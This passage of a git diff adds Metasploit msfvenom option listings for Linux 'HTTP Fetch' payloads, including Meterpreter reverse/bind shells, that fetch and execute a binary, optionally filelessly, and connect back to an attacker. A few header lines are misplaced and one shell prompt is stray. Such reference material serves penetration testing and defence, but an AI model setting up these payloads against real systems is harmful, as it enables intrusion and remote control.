Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..66c781f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sraqFjpIFkj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-exec.txt b/msfvenom/payload_options/cmd-linux-http-x64-exec.txt new file mode 100644 index 0000000..765ab62 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-exec.txt 
@@ -0,0 +1,71 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EgLoNCydek no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..20a7dc5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-bind_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Brent Cook + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dwYkaNCfv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork 
false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..c453074 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTP Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/http/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x64/meterpreter/reverse_sctp: +========================= + +tman@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YrQIaUhKemN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..234ba5e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x64/meterpreter/reverse_tcp: +========================= + + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME clGbLkazLEp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork 
false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..ff3d6ad --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt 
@@ -0,0 +1,103 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PXXxsZpFxU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

